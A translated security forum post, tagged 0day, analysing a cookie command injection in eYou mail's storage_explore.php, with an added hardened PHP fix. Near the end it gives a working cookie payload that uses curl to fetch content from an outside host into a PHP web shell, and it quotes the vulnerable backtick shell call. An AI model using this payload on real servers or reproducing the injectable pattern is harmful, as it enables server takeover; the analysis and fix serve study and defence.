『Hippo』 eyou Storage_explore.php Cookie Command Injection Exploit Tool


File: /user/storage_explore.php
<?php
/**
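* User network storage list
*
* This page displays the network storage file list of the logged-in mailbox user; selected files are added to the mail as attachments.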
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// Get the maximum attachment size the user is allowed to upload
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
Following the getCookieUserValue function:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

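Following the cookie function:
function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
    return '';
}

The cookie is not filtered at any point in this process.

The USER value is read straight from the cookie and then passed into the getUserDirPath function.

Now look at the getUserDirPath function: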

/**
* Get the path of the user's directory
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

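$uid and $domain are interpolated directly into the command string, which the backtick operator hands to the shell, so this leads to command execution.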
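
A hardened counterpart to getCookieUserValue and getUserDirPath, as an added example that is not eYou's code or part of the original post. It assumes PHP 7.4 or later (for the array form of proc_open); the allow-list patterns and the function names ending in Safe are hypothetical.

```php
<?php
// Added example: the UID and DOMAIN patterns below are assumptions about
// valid account names, not values taken from the eYou code base.
const UID_PATTERN    = '/\A[A-Za-z0-9._-]{1,64}\z/';
const DOMAIN_PATTERN = '/\A[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?\z/';

// Parse the USER cookie the way the original does, but fail closed:
// a value that does not match its allow-list is returned as null.
function getCookieUserValueSafe(string $cookie, string $key, string $pattern): ?string
{
    foreach (explode('&', $cookie) as $pair) {
        $parts = explode('=', $pair, 2);
        if (count($parts) === 2 && $parts[0] === $key) {
            return preg_match($pattern, $parts[1]) === 1 ? $parts[1] : null;
        }
    }
    return null;
}

// Run hashid without a shell. With an argv array, proc_open() passes each
// value as exactly one argument, so |, ;, > and backticks are plain data.
function getUserDirPathSafe(string $uid, string $domain, string $hashid = '/var/eyou/sbin/hashid'): string
{
    $proc = proc_open([$hashid, $uid, $domain], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('hashid could not be started');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    if (proc_close($proc) !== 0) {
        throw new RuntimeException('hashid failed');
    }
    return trim($out);
}

// Constructed sample cookies: one well-formed, one with a pipe in UID.
$samples = ['UID=alice&DOMAIN=example.com&SKIN=default', 'UID=1|x&DOMAIN=example.com'];
foreach ($samples as $cookie) {
    $uid    = getCookieUserValueSafe($cookie, 'UID', UID_PATTERN);
    $domain = getCookieUserValueSafe($cookie, 'DOMAIN', DOMAIN_PATTERN);
    echo ($uid !== null && $domain !== null) ? "accept: $uid@$domain\n" : "reject: malformed USER cookie\n";
}
```

On PHP versions older than 7.4, where proc_open() accepts only a command string, wrapping each value in escapeshellarg() after the same allow-list check serves the same purpose.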



Exploitation:

Set the cookie to:

USER=UID=1|curl http://www.isafe.cc:8080/test.txt>>www.isafe.cc.php
Then visit localhost/user/storage_explore.php
This creates the file www.isafe.cc.php under localhost/user/

The shell address is:

localhost/user/www.isafe.cc.php

[This post was edited by admin on 2017-10-14 07:51 PM]
Source: original to this site
Tags: 0day